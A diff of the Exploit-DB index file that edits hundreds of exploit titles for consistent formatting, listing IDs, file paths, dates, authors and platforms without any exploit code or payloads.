38326,platforms/php/webapps/38326.txt,"Zenphoto - 'index.php' SQL Injection",2013-02-20,HosseinNsn,php,webapps,0 38327,platforms/php/webapps/38327.txt,"PHPmyGallery 1.5 - Local File Disclosure / Cross-Site Scripting",2013-02-21,TheMirkin,php,webapps,0 38328,platforms/php/webapps/38328.txt,"OpenEMR - 'site' Parameter Cross-Site Scripting",2013-02-21,"Gjoko Krstic",php,webapps,0 @@ -34621,10 +34616,10 @@ id,file,description,date,author,platform,type,port 38330,platforms/windows/remote/38330.txt,"Photodex ProShow Producer - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-02-23,"Julien Ahrens",windows,remote,0 38331,platforms/php/webapps/38331.txt,"WordPress Smart Flv Plugin - 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities",2013-02-25,"Henri Salo",php,webapps,0 38332,platforms/php/webapps/38332.txt,"Batavi - 'index.php' Cross-Site Scripting",2013-03-01,Dognaedis,php,webapps,0 -38333,platforms/php/webapps/38333.txt,"phpMyRecipes Multiple HTML Injection Vulnerabilities",2013-02-25,PDS,php,webapps,0 +38333,platforms/php/webapps/38333.txt,"phpMyRecipes - Multiple HTML Injection Vulnerabilities",2013-02-25,PDS,php,webapps,0 38334,platforms/jsp/webapps/38334.txt,"JForum - 'jforum.page' Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,ZeroDayLab,jsp,webapps,0 -38335,platforms/php/webapps/38335.txt,"Geeklog Cross-Site Scripting",2013-02-27,"High-Tech Bridge",php,webapps,0 -38336,platforms/windows/dos/38336.py,"Git-1.9.5 ssh-agent.exe Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0 +38335,platforms/php/webapps/38335.txt,"Geeklog - Cross-Site Scripting",2013-02-27,"High-Tech Bridge",php,webapps,0 +38336,platforms/windows/dos/38336.py,"Git-1.9.5 - ssh-agent.exe Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0 38337,platforms/ios/dos/38337.txt,"Telegram 3.2 - Input Length Handling Crash PoC",2015-09-28,"Mohammad Reza Espargham",ios,dos,0 38338,platforms/jsp/webapps/38338.txt,"Mango Automation 2.6.0 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,jsp,webapps,80 38339,platforms/php/webapps/38339.txt,"Centreon 2.6.1 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,php,webapps,80 @@ -34633,18 +34628,18 @@ id,file,description,date,author,platform,type,port 38342,platforms/ios/webapps/38342.txt,"My.WiFi USB Drive 1.0 iOS - File Include",2015-09-28,Vulnerability-Lab,ios,webapps,8080 38343,platforms/ios/webapps/38343.txt,"Photos in Wifi 1.0.1 iOS - Arbitrary File Upload",2015-09-28,Vulnerability-Lab,ios,webapps,0 38344,platforms/windows/dos/38344.txt,"Adobe Acrobat Reader - AFParseDate Javascript API Restrictions Bypass",2015-09-28,"Reigning Shells",windows,dos,0 -38345,platforms/php/webapps/38345.txt,"Vtiger CRM 6.3.0 Authenticated Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",php,webapps,80 +38345,platforms/php/webapps/38345.txt,"Vtiger CRM 6.3.0 - Authenticated Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",php,webapps,80 38346,platforms/bsd/remote/38346.rb,"Watchguard XCS - Remote Command Execution",2015-09-28,Metasploit,bsd,remote,443 38347,platforms/bsd/local/38347.rb,"Watchguard XCS - FixCorruptMail Local Privilege Escalation",2015-09-28,Metasploit,bsd,local,443 38348,platforms/windows/dos/38348.txt,"Adobe Flash - No Checks on Vector. Capacity Field",2015-09-28,"Google Security Research",windows,dos,0 38349,platforms/windows/local/38349.py,"IconLover 5.42 - Local Buffer Overflow Exploit",2015-09-29,cor3sm4sh3r,windows,local,0 38350,platforms/hardware/webapps/38350.txt,"Western Digital My Cloud 04.01.03-421 / 04.01.04-422 - Command Injection",2015-09-29,absane,hardware,webapps,0 38351,platforms/asp/webapps/38351.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (2)",2015-09-29,"Pedro Ribeiro",asp,webapps,0 -38352,platforms/windows/remote/38352.rb,"ManageEngine EventLog Analyzer Remote Code Execution",2015-09-29,Metasploit,windows,remote,8400 +38352,platforms/windows/remote/38352.rb,"ManageEngine EventLog Analyzer - Remote Code Execution",2015-09-29,Metasploit,windows,remote,8400 38353,platforms/linux/local/38353.txt,"Apport 2.19 (Ubuntu 15.04) - Local Privilege Escalation",2015-09-29,halfdog,linux,local,0 -38354,platforms/php/webapps/38354.txt,"Plogger Multiple Input Validation Vulnerabilities",2013-03-02,"Saadat Ullah",php,webapps,0 +38354,platforms/php/webapps/38354.txt,"Plogger - Multiple Input Validation Vulnerabilities",2013-03-02,"Saadat Ullah",php,webapps,0 38355,platforms/php/webapps/38355.txt,"WordPress Uploader Plugin - 'blog' Parameter Cross-Site Scripting",2013-03-01,CodeV,php,webapps,0 -38356,platforms/hardware/remote/38356.txt,"Foscam Prior to 11.37.2.49 Directory Traversal",2013-03-01,"Frederic Basse",hardware,remote,0 +38356,platforms/hardware/remote/38356.txt,"Foscam < 11.37.2.49 - Directory Traversal",2013-03-01,"Frederic Basse",hardware,remote,0 38357,platforms/linux/local/38357.c,"rpi-update Insecure Temporary File Handling and Security Bypass Vulnerabilities",2013-02-28,Technion,linux,local,0 38358,platforms/java/webapps/38358.txt,"HP Intelligent Management Center - 'topoContent.jsf' Cross-Site Scripting",2013-03-04,"Julien Ahrens",java,webapps,0 38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin - 'daytoshow' Parameter Cross-Site Scripting",2013-03-05,alejandr0.m0f0,php,webapps,0 @@ -34655,32 +34650,32 @@ id,file,description,date,author,platform,type,port 38363,platforms/php/webapps/38363.txt,"File Manager - HTML Injection / Local File Inclusion",2013-02-23,"Benjamin Kunz Mejri",php,webapps,0 38364,platforms/multiple/dos/38364.txt,"Varnish Cache - Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,multiple,dos,0 38365,platforms/linux/dos/38365.txt,"Squid - 'httpMakeVaryMark()' Function Remote Denial of Service",2013-03-05,tytusromekiatomek,linux,dos,0 -38366,platforms/multiple/webapps/38366.py,"Verax NMS Multiple Method Authentication Bypass",2013-02-06,"Andrew Brooks",multiple,webapps,0 +38366,platforms/multiple/webapps/38366.py,"Verax NMS - Multiple Method Authentication Bypass",2013-02-06,"Andrew Brooks",multiple,webapps,0 38367,platforms/php/webapps/38367.txt,"Your Own Classifieds - Cross-Site Scripting",2013-03-08,"Rafay Baloch",php,webapps,0 38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager - 'cert_cn' Parameter Cross-Site Scripting",2013-03-08,"Asheesh Anaconda",multiple,remote,0 38369,platforms/hardware/webapps/38369.txt,"Bosch Security Systems Dinion NBN-498 Web Interface - XML Injection",2015-10-01,neom22,hardware,webapps,0 38370,platforms/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote,0 38371,platforms/osx/local/38371.py,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0 38372,platforms/php/webapps/38372.html,"Question2Answer - Cross-Site Request Forgery",2013-03-01,MustLive,php,webapps,0 -38373,platforms/php/webapps/38373.txt,"WordPress Terillion Reviews Plugin Profile Id HTML Injection",2013-03-08,"Aditya Balapure",php,webapps,0 -38374,platforms/php/webapps/38374.txt,"SWFUpload Multiple Content Spoofing And Cross-Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0 +38373,platforms/php/webapps/38373.txt,"WordPress Terillion Reviews Plugin Profile Id - HTML Injection",2013-03-08,"Aditya Balapure",php,webapps,0 +38374,platforms/php/webapps/38374.txt,"SWFUpload - Multiple Content Spoofing And Cross-Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0 38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics - 'warning' Parameter Cross-Site Scripting",2013-03-10,"Manuel García Cárdenas",php,webapps,0 38376,platforms/php/webapps/38376.txt,"WordPress podPress Plugin - 'playerID' Parameter Cross-Site Scripting",2013-03-11,hiphop,php,webapps,0 -38377,platforms/php/webapps/38377.txt,"Privoxy Proxy Authentication Information Disclosure Vulnerabilities",2013-03-11,"Chris John Riley",php,webapps,0 +38377,platforms/php/webapps/38377.txt,"Privoxy Proxy - Authentication Information Disclosure Vulnerabilities",2013-03-11,"Chris John Riley",php,webapps,0 38379,platforms/windows/webapps/38379.txt,"FTGate 2009 Build 6.4.00 - Multiple Vulnerabilities",2015-10-02,hyp3rlinx,windows,webapps,0 38380,platforms/windows/webapps/38380.txt,"FTGate 7 - CSRF",2015-10-02,hyp3rlinx,windows,webapps,0 38381,platforms/windows/local/38381.py,"WinRar < 5.30 beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,windows,local,0 38382,platforms/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - .asx Stack Overflow",2015-10-02,ex_ptr,windows,local,0 38383,platforms/linux/webapps/38383.py,"ElasticSearch 1.6.0 - Arbitrary File Download",2015-10-02,"Pedro Andujar",linux,webapps,9200 38384,platforms/windows/remote/38384.txt,"Avast Antivirus - X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0 -38385,platforms/php/webapps/38385.txt,"KindEditor Multiple Remote File Upload Vulnerabilities",2013-03-11,KedAns-Dz,php,webapps,0 +38385,platforms/php/webapps/38385.txt,"KindEditor - Multiple Remote File Upload Vulnerabilities",2013-03-11,KedAns-Dz,php,webapps,0 38386,platforms/php/webapps/38386.txt,"PHPBoost - Arbitrary File Upload / Information Disclosure",2013-03-11,KedAns-Dz,php,webapps,0 38387,platforms/multiple/remote/38387.txt,"RubyGems fastreader - 'entry_controller.rb' Remote Command Execution",2013-03-12,"Larry W. Cashdollar",multiple,remote,0 38388,platforms/windows/remote/38388.txt,"QlikView - '.qvw' File Remote Integer Overflow",2013-03-13,"A. Antukh",windows,remote,0 38389,platforms/hardware/remote/38389.txt,"Cisco Video Surveillance Operations Manager - Multiple Security Vulnerabilities",2013-03-13,b.saleh,hardware,remote,0 38390,platforms/linux/local/38390.c,"Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation",2013-03-13,"Sebastian Krahmer",linux,local,0 38391,platforms/php/webapps/38391.txt,"Petite Annonce Cross-Site Scripting",2013-03-14,Metropolis,php,webapps,0 -38392,platforms/linux/dos/38392.txt,"MySQL and MariaDB Geometry Query Denial Of Service",2013-03-07,"Alyssa Milburn",linux,dos,0 +38392,platforms/linux/dos/38392.txt,"MySQL / MariaDB - Geometry Query Denial Of Service",2013-03-07,"Alyssa Milburn",linux,dos,0 38393,platforms/php/webapps/38393.html,"WordPress Occasions Plugin - Cross-Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 38394,platforms/windows/remote/38394.py,"BlazeVideo HDTV Player Standard - '.PLF' File Remote Buffer Overflow",2013-03-19,metacom,windows,remote,0 38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080 @@ -34698,17 +34693,17 @@ id,file,description,date,author,platform,type,port 38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0 38411,platforms/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - CSRF",2015-10-07,hyp3rlinx,python,webapps,0 38412,platforms/multiple/remote/38412.txt,"IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross-Site Scripting Vulnerabilities",2013-03-26,MustLive,multiple,remote,0 -38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0 +38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory - Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0 38414,platforms/php/webapps/38414.txt,"WordPress Feedweb Plugin - 'wp_post_id' Parameter Cross-Site Scripting",2013-03-30,"Stefan Schurtz",php,webapps,0 38415,platforms/asp/webapps/38415.txt,"C2 WebResource - 'File' Parameter Cross-Site Scripting",2013-04-03,anonymous,asp,webapps,0 38416,platforms/php/webapps/38416.txt,"e107 - 'content_preset.php' Cross-Site Scripting",2013-04-03,"Simon Bieber",php,webapps,0 38417,platforms/php/webapps/38417.txt,"Symphony - 'sort' Parameter SQL Injection",2013-04-03,"High-Tech Bridge",php,webapps,0 -38418,platforms/php/webapps/38418.txt,"FUDforum Multiple Remote PHP Code Injection Vulnerabilities",2013-04-03,"High-Tech Bridge",php,webapps,0 -38419,platforms/windows/dos/38419.txt,"SmallFTPD Unspecified Denial of Service",2013-04-03,AkaStep,windows,dos,0 -38420,platforms/multiple/dos/38420.txt,"Google Chrome Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0 +38418,platforms/php/webapps/38418.txt,"FUDforum - Multiple Remote PHP Code Injection Vulnerabilities",2013-04-03,"High-Tech Bridge",php,webapps,0 +38419,platforms/windows/dos/38419.txt,"SmallFTPD - Unspecified Denial of Service",2013-04-03,AkaStep,windows,dos,0 +38420,platforms/multiple/dos/38420.txt,"Google Chrome - Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0 38421,platforms/linux/dos/38421.txt,"Apache Subversion 1.6.x - 'mod_dav_svn/lock.c' Remote Denial of Service",2013-04-05,anonymous,linux,dos,0 38422,platforms/linux/dos/38422.txt,"Apache Subversion - Remote Denial of Service",2013-04-05,"Greg McMullin",linux,dos,0 -38423,platforms/windows/local/38423.py,"VeryPDF Image2PDF Converter SEH Buffer Overflow",2015-10-08,"Robbie Corley",windows,local,0 +38423,platforms/windows/local/38423.py,"VeryPDF Image2PDF Converter - SEH Buffer Overflow",2015-10-08,"Robbie Corley",windows,local,0 38424,platforms/multiple/webapps/38424.txt,"Kallithea 0.2.9 - (came_from) HTTP Response Splitting",2015-10-08,LiquidWorm,multiple,webapps,0 38425,platforms/php/webapps/38425.txt,"PHP Address Book - /addressbook/register/delete_user.php id Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38426,platforms/php/webapps/38426.txt,"PHP Address Book - /addressbook/register/edit_user.php id Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 @@ -34758,7 +34753,7 @@ id,file,description,date,author,platform,type,port 38472,platforms/windows/local/38472.py,"Blat 2.7.6 SMTP / NNTP Mailer - Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0 38473,platforms/linux/local/38473.py,"Linux 3.17 - noexec File Permission Bypass (Python ctypes and memfd_create)",2015-10-15,soyer,linux,local,0 38474,platforms/windows/local/38474.txt,"Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0 -38478,platforms/php/webapps/38478.txt,"Sosci Survey Multiple Security Vulnerabilities",2013-04-17,"T. Lazauninkas",php,webapps,0 +38478,platforms/php/webapps/38478.txt,"Sosci Survey - Multiple Security Vulnerabilities",2013-04-17,"T. Lazauninkas",php,webapps,0 38479,platforms/asp/webapps/38479.txt,"Matrix42 Service Store - 'default.aspx' Cross-Site Scripting",2013-03-06,43zsec,asp,webapps,0 38480,platforms/php/webapps/38480.txt,"Fork CMS - 'file' Parameter Local File Inclusion",2013-04-18,"Rafay Baloch",php,webapps,0 38481,platforms/hardware/remote/38481.html,"D-Link DIR-865L - Cross-Site Request Forgery",2013-04-19,"Jacob Holcomb",hardware,remote,0 @@ -34772,7 +34767,7 @@ id,file,description,date,author,platform,type,port 38489,platforms/php/remote/38489.rb,"Nibbleblog - File Upload",2015-10-19,Metasploit,php,remote,0 38490,platforms/multiple/dos/38490.txt,"Adobe Flash IExternalizable.writeExternal - Type Confusion",2015-10-19,"Google Security Research",multiple,dos,0 38491,platforms/php/webapps/38491.php,"SMF - 'index.php' HTML injection / Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0 -38492,platforms/hardware/remote/38492.html,"TP-Link TL-WR1043N Router Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",hardware,remote,0 +38492,platforms/hardware/remote/38492.html,"TP-Link TL-WR1043N Router - Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",hardware,remote,0 38493,platforms/hardware/dos/38493.txt,"Cisco Linksys WRT310N Router - Multiple Denial of Service Vulnerabilities",2013-04-23,"Carl Benedict",hardware,dos,0 38494,platforms/php/webapps/38494.txt,"WordPress WP Super Cache Plugin - Remote PHP Code Execution",2013-04-24,anonymous,php,webapps,0 38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router - Cross-Site Request Forgery",2013-04-25,"Jacob Holcomb",hardware,remote,0 @@ -34801,20 +34796,20 @@ id,file,description,date,author,platform,type,port 38518,platforms/php/webapps/38518.txt,"Jojo CMS - 'search' Parameter Cross-Site Scripting",2013-05-15,"High-Tech Bridge SA",php,webapps,0 38519,platforms/php/webapps/38519.txt,"Jojo CMS - 'X-Forwarded-For' HTTP header SQL Injection",2013-05-15,"High-Tech Bridge SA",php,webapps,0 38520,platforms/php/webapps/38520.html,"WordPress WP Cleanfix Plugin - Cross-Site Request Forgery",2013-05-16,"Enigma Ideas",php,webapps,0 -38521,platforms/multiple/remote/38521.c,"Python RRDtool Module Function Format String",2013-05-18,"Thomas Pollet",multiple,remote,0 +38521,platforms/multiple/remote/38521.c,"Python RRDtool Module - Function Format String",2013-05-18,"Thomas Pollet",multiple,remote,0 38522,platforms/linux/remote/38522.txt,"Acme thttpd HTTP Server - Directory Traversal",2013-05-19,Metropolis,linux,remote,0 38523,platforms/php/webapps/38523.txt,"Weyal CMS - Multiple SQL Injection",2013-05-23,XroGuE,php,webapps,0 -38524,platforms/php/webapps/38524.pl,"Matterdaddy Market Multiple Security Vulnerabilities",2013-05-24,KedAns-Dz,php,webapps,0 +38524,platforms/php/webapps/38524.pl,"Matterdaddy Market - Multiple Security Vulnerabilities",2013-05-24,KedAns-Dz,php,webapps,0 38525,platforms/php/webapps/38525.txt,"Subrion 3.X.X - Multiple Vulnerabilities",2015-10-23,bRpsd,php,webapps,0 38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0 38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injection",2015-10-23,"Bikramaditya Guha",php,webapps,0 38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS / CSRF",2015-10-23,"Bikramaditya Guha",php,webapps,0 -38572,platforms/php/webapps/38572.txt,"PHP Server Monitor 3.1.1- Multiple CSRF Vulnerabilities",2015-10-30,hyp3rlinx,php,webapps,0 +38572,platforms/php/webapps/38572.txt,"PHP Server Monitor 3.1.1 - Multiple CSRF Vulnerabilities",2015-10-30,hyp3rlinx,php,webapps,0 38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR + DEP bypass)",2015-10-25,g00dv1n,windows,local,0 38533,platforms/windows/local/38533.c,"Windows 10 - pcap Driver Local Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0 38534,platforms/php/webapps/38534.php,"Joomla 3.2.x < 3.4.4 - SQL Injection",2015-10-26,"Manish Tanwar",php,webapps,0 38535,platforms/osx/remote/38535.rb,"Safari User-Assisted Applescript Exec Attack",2015-10-26,Metasploit,osx,remote,0 -38538,platforms/multiple/dos/38538.py,"Code::Blocks Denial of Service",2013-05-29,ariarat,multiple,dos,0 +38538,platforms/multiple/dos/38538.py,"Code::Blocks - Denial of Service",2013-05-29,ariarat,multiple,dos,0 38644,platforms/windows/remote/38644.txt,"Solarwinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution",2015-11-06,"Chris Graham",windows,remote,0 38645,platforms/jsp/webapps/38645.txt,"NXFilter 3.0.3 - CSRF",2015-11-06,hyp3rlinx,jsp,webapps,0 38540,platforms/osx/local/38540.rb,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0 @@ -34824,10 +34819,10 @@ id,file,description,date,author,platform,type,port 38545,platforms/php/webapps/38545.txt,"Telaen 2.7.x - Cross-Site Scripting",2013-06-04,"Manuel García Cárdenas",php,webapps,0 38546,platforms/php/webapps/38546.txt,"Telaen 2.7.x - Open Redirection",2013-06-04,"Manuel García Cárdenas",php,webapps,0 38547,platforms/php/webapps/38547.txt,"CMS Gratis Indonesia - 'config.php' PHP Code Injection",2013-06-04,"CWH Underground",php,webapps,0 -38548,platforms/php/webapps/38548.txt,"Telaen Information Disclosure",2013-06-03,"Manuel García Cárdenas",php,webapps,0 -38549,platforms/multiple/remote/38549.txt,"Apache Struts OGNL Expression Injection",2013-06-05,"Jon Passki",multiple,remote,0 -38550,platforms/cgi/webapps/38550.txt,"QNAP VioStor NVR and QNAP NAS Remote Code Execution",2013-06-05,"Tim Herres",cgi,webapps,0 -38551,platforms/java/webapps/38551.py,"JIRA and HipChat for JIRA Plugin Velocity Template Injection",2015-10-28,"Chris Wood",java,webapps,0 +38548,platforms/php/webapps/38548.txt,"Telaen - Information Disclosure",2013-06-03,"Manuel García Cárdenas",php,webapps,0 +38549,platforms/multiple/remote/38549.txt,"Apache Struts - OGNL Expression Injection",2013-06-05,"Jon Passki",multiple,remote,0 +38550,platforms/cgi/webapps/38550.txt,"QNAP VioStor NVR / QNAP NAS - Remote Code Execution",2013-06-05,"Tim Herres",cgi,webapps,0 +38551,platforms/java/webapps/38551.py,"JIRA and HipChat for JIRA Plugin - Velocity Template Injection",2015-10-28,"Chris Wood",java,webapps,0 38553,platforms/hardware/webapps/38553.txt,"Sagem FAST3304-V2 - Authentication Bypass",2015-10-28,"Soufiane Alami Hassani",hardware,webapps,0 38554,platforms/android/remote/38554.py,"Samsung SecEmailUI - Script Injection",2015-10-28,"Google Security Research",android,remote,0 38555,platforms/android/dos/38555.txt,"Samsung - m2m1shot Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0 @@ -34835,9 +34830,9 @@ id,file,description,date,author,platform,type,port 38557,platforms/android/dos/38557.txt,"Samsung fimg2d - FIMG2D_BITBLT_BLIT ioctl Concurrency Flaw",2015-10-28,"Google Security Research",android,dos,0 38558,platforms/android/dos/38558.txt,"Samsung SecEmailComposer QUICK_REPLY_BACKGROUND Permissions Weakness",2015-10-28,"Google Security Research",android,dos,0 38559,platforms/linux/local/38559.txt,"Linux Kernel 3.3.5 - 'b43' Wireless Driver Local Privilege Escalation",2013-06-07,"Kees Cook",linux,local,0 -38560,platforms/php/webapps/38560.txt,"Caucho Resin /resin-admin/ URI XSS",2013-06-07,"Gjoko Krstic",php,webapps,0 +38560,platforms/php/webapps/38560.txt,"Caucho Resin - /resin-admin/ URI XSS",2013-06-07,"Gjoko Krstic",php,webapps,0 38561,platforms/php/webapps/38561.txt,"Caucho Resin - index.php logout Parameter XSS",2013-06-07,"Gjoko Krstic",php,webapps,0 -38562,platforms/php/webapps/38562.txt,"HP Insight Diagnostics Remote Code Injection",2013-06-10,"Markus Wulftange",php,webapps,0 +38562,platforms/php/webapps/38562.txt,"HP Insight Diagnostics - Remote Code Injection",2013-06-10,"Markus Wulftange",php,webapps,0 38563,platforms/php/webapps/38563.txt,"HP Insight Diagnostics - Local File Inclusion",2013-06-10,"Markus Wulftange",php,webapps,0 38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field SEH Overflow Crash PoC",2015-10-29,"Luis Martínez",windows,dos,0 38565,platforms/php/webapps/38565.txt,"Joomla JNews (com_jnews) Component 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80 @@ -34848,7 +34843,7 @@ id,file,description,date,author,platform,type,port 38570,platforms/php/webapps/38570.txt,"ScriptCase - 'scelta_categoria.php' SQL Injection",2013-06-10,"Hossein Hezami",php,webapps,0 38571,platforms/php/webapps/38571.txt,"mkCMS - 'index.php' Arbitrary PHP Code Execution",2013-06-11,"CWH Underground",php,webapps,0 38573,platforms/php/webapps/38573.txt,"eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection",2015-10-30,"Dawid Golunski",php,webapps,0 -38574,platforms/php/webapps/38574.html,"PHP Server Monitor 3.1.1- CSRF Privilege Escalation",2015-10-30,hyp3rlinx,php,webapps,0 +38574,platforms/php/webapps/38574.html,"PHP Server Monitor 3.1.1 - CSRF Privilege Escalation",2015-10-30,hyp3rlinx,php,webapps,0 38575,platforms/hardware/webapps/38575.txt,"Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution",2015-10-30,"Dolev Farhi",hardware,webapps,0 38576,platforms/aix/local/38576.sh,"AIX 7.1 - lquerylv Local Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0 38577,platforms/php/webapps/38577.txt,"Pligg CMS 2.0.2 - Multiple SQL Injection",2015-10-30,"Curesec Research Team",php,webapps,0 @@ -34857,21 +34852,21 @@ id,file,description,date,author,platform,type,port 38580,platforms/windows/dos/38580.txt,"Windows - NtCreateLowBoxToken Handle Capture Local DoS/Elevation of Privilege (MS15-111)",2015-10-30,"Google Security Research",windows,dos,0 38581,platforms/php/webapps/38581.txt,"Oxwall 1.7.4 - CSRF",2015-10-30,"High-Tech Bridge SA",php,webapps,0 38582,platforms/hardware/remote/38582.html,"Brickcom Multiple IP Cameras - Cross-Site Request Forgery",2013-06-12,Castillo,hardware,remote,0 -38583,platforms/hardware/remote/38583.html,"Sony CH and DH Series IP Cameras Multiple Cross-Site Request Forgery Vulnerabilities",2013-06-12,Castillo,hardware,remote,0 -38584,platforms/hardware/remote/38584.txt,"Grandstream Multiple IP Cameras Cross-Site Request Forgery",2013-06-12,Castillo,hardware,remote,0 +38583,platforms/hardware/remote/38583.html,"Sony CH / DH Series IP Cameras - Multiple Cross-Site Request Forgery Vulnerabilities",2013-06-12,Castillo,hardware,remote,0 +38584,platforms/hardware/remote/38584.txt,"Grandstream Multiple IP Cameras - Cross-Site Request Forgery",2013-06-12,Castillo,hardware,remote,0 38585,platforms/php/webapps/38585.pl,"WordPress NextGEN Gallery Plugin - 'upload.php' Arbitrary File Upload",2013-06-12,"Marcos Garcia",php,webapps,0 38586,platforms/android/remote/38586.txt,"TaxiMonger for Android - 'name' Parameter HTML Injection",2013-06-15,"Ismail Kaleem",android,remote,0 -38587,platforms/multiple/remote/38587.txt,"Monkey HTTP Daemon Mandril Security Plugin Security Bypass",2013-06-14,felipensp,multiple,remote,0 +38587,platforms/multiple/remote/38587.txt,"Monkey HTTP Daemon Mandril Security Plugin - Security Bypass",2013-06-14,felipensp,multiple,remote,0 38588,platforms/php/webapps/38588.php,"bloofoxCMS - 'index.php' Arbitrary File Upload",2013-06-17,"CWH Underground",php,webapps,0 38589,platforms/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Function Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0 38590,platforms/php/webapps/38590.txt,"et-chat - Privilege Escalation / Arbitrary Shell Upload",2013-06-18,MR.XpR,php,webapps,0 38591,platforms/hardware/remote/38591.py,"TP-LINK TL-PS110U Print Server - 'tplink-enum.py' Security Bypass",2013-06-19,SANTHO,hardware,remote,0 38592,platforms/php/webapps/38592.php,"Joomla! RokDownloads Component - Arbitrary File Upload",2013-06-19,Am!r,php,webapps,0 -38593,platforms/cgi/webapps/38593.txt,"FtpLocate HTML Injection",2013-06-24,Chako,cgi,webapps,0 +38593,platforms/cgi/webapps/38593.txt,"FtpLocate - HTML Injection",2013-06-24,Chako,cgi,webapps,0 38594,platforms/php/webapps/38594.txt,"Barnraiser Prairie - 'get_file.php' Directory Traversal",2013-06-25,prairie,php,webapps,0 38595,platforms/multiple/dos/38595.txt,"Oracle VM VirtualBox 4.0 - 'tracepath' Local Denial of Service",2013-06-26,"Thomas Dreibholz",multiple,dos,0 38596,platforms/php/webapps/38596.txt,"Xaraya - Multiple Cross-Site Scripting Vulnerabilities",2013-06-26,"High-Tech Bridge",php,webapps,0 -38597,platforms/multiple/remote/38597.txt,"Motion Multiple Remote Security Vulnerabilities",2013-06-26,xistence,multiple,remote,0 +38597,platforms/multiple/remote/38597.txt,"Motion - Multiple Remote Security Vulnerabilities",2013-06-26,xistence,multiple,remote,0 38598,platforms/php/webapps/38598.txt,"ZamFoo - 'date' Parameter Remote Command Injection",2013-06-15,localhost.re,php,webapps,0 38599,platforms/win_x86/remote/38599.py,"Symantec pcAnywhere 12.5.0 Windows x86 - Remote Code Execution",2015-11-02,"Tomislav Paskalev",win_x86,remote,0 38600,platforms/windows/local/38600.py,"Sam Spade 1.14 - (Crawl website) Buffer OverFlow",2015-11-02,MandawCoder,windows,local,0 @@ -34893,28 +34888,28 @@ id,file,description,date,author,platform,type,port 38616,platforms/multiple/dos/38616.txt,"Python 2.7 array.fromstring Method - Use-After-Free",2015-11-03,"John Leitch",multiple,dos,0 38617,platforms/windows/dos/38617.txt,"Python 2.7 strop.replace() Method - Integer Overflow",2015-11-03,"John Leitch",windows,dos,0 38618,platforms/windows/dos/38618.txt,"Python 3.3 < 3.5 product_setstate() Function - Out-of-bounds Read",2015-11-03,"John Leitch",windows,dos,0 -38631,platforms/windows/local/38631.txt,"McAfee Data Loss Prevention Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local,0 +38631,platforms/windows/local/38631.txt,"McAfee Data Loss Prevention - Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local,0 